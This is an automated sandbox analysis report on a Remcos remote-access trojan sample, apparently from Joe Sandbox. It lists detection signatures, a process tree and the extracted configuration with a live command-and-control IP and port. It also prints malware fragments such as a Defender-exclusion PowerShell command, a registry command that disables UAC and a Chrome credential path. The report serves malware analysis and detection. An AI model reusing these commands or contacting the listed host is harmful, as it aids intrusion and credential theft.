Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iGhDjzEiDU.exe

Overview

General Information

Sample name:iGhDjzEiDU.exe
renamed because original name is a hash value
Original sample name:7caf240db905f259197cf71b03acf888.exe
Analysis ID:1583975
MD5:7caf240db905f259197cf71b03acf888
SHA1:d8d9726a0a67795a01fed368055d9315feada3fd
SHA256:c8017f526793dd8b6b6e98bfa9847fcf3aa7c4096a8432719a8324e06ba8c088
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • iGhDjzEiDU.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
    • powershell.exe (PID: 1740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • iGhDjzEiDU.exe (PID: 3612 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
    • iGhDjzEiDU.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\iGhDjzEiDU.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
      • graias.exe (PID: 6620 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
        • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7336 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • graias.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\Graias\graias.exe" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • svchost.exe (PID: 7248 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 1704 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 7312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8440 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9124 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 3052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6896 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • dxdiag.exe (PID: 8544 cmdline: "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
          • graias.exe (PID: 8392 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 8432 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 7468 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 8576 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 3068 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • graias.exe (PID: 3084 cmdline: C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon" MD5: 7CAF240DB905F259197CF71B03ACF888)
          • svchost.exe (PID: 2188 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 1068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8364 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 8888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 5500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 8548 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 8840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 4500 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • wscript.exe (PID: 2920 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • chrome.exe (PID: 2828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\graias\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 20 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.iGhDjzEiDU.exe.43c65b8.3.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0.2.iGhDjzEiDU.exe.43c65b8.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.iGhDjzEiDU.exe.43c65b8.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.iGhDjzEiDU.exe.43c65b8.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69ef8:$a1: Remcos restarted by watchdog!
                • 0x6a470:$a3: %02i:%02i:%02i:%03i
                0.2.iGhDjzEiDU.exe.43c65b8.3.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64204:$str_b2: Executing file:
                • 0x6503c:$str_b3: GetDirectListeningPort
                • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x64b80:$str_b7: \update.vbs
                • 0x6422c:$str_b9: Downloaded file:
                • 0x64218:$str_b10: Downloading file:
                • 0x642bc:$str_b12: Failed to upload file:
                • 0x65004:$str_b13: StartForward
                • 0x65024:$str_b14: StopForward
                • 0x64ad8:$str_b15: fso.DeleteFile "
                • 0x64a6c:$str_b16: On Error Resume Next
                • 0x64b08:$str_b17: fso.DeleteFolder "
                • 0x642ac:$str_b18: Uploaded file:
                • 0x6426c:$str_b19: Unable to delete:
                • 0x64aa0:$str_b20: while fso.FileExists("
                • 0x64749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 34 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Potentially Suspicious Malware Callback Communication
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.72.215, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, Initiated: true, ProcessId: 7188, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
